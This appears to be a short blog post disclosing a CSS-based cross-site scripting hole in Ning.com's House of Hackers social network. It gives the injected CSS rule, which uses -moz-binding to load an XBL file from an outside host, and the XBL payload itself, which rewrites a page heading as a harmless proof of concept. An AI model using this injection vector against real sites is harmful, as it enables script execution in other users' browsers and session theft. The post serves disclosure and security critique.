House Of Hacked Hackers.

Publicated on : 1210156714
Ah well, pun intended. :)



Looks like Ning.com is vulnerable to XSS, and quite a bit at it. I signed up on PDP's new social network called House of Hackers. It seems that Ning let us edit the stylesheet, obviously they never heard of CSS XSS moz-binding attacks otherwise this would not work. These XSS attacks can be launched from a stylesheet.



http://houseofhackers.ning.com/profile/0x0000000



I just created a new CSS rule that fetches the XBL sheet that I borrowed from my good friend Gareth to include it on Ning as an example.

 

#xg_body {
 

-moz-binding:url("http://0x000000.com/xbl.xml#xss");
 

}
 

Which modifies the page like so:

 

<?xml version="1.0"?>
 

<bindings xmlns="http://www.mozilla.org/xbl"
 

xmlns:html="http://www.w3.org/1999/xhtml">
 

<binding id="xss">
 

<implementation>
 

<constructor>
 

document.getElementById('xg_sitename').innerHTML = '<h1>HOUSE OF H4x0rs!!!!!</h1>';
 

</constructor>
 

</implementation>
 

</binding>
 

</bindings>
 

There are probably more vectors possible, and hence my problem with such sites as a whole.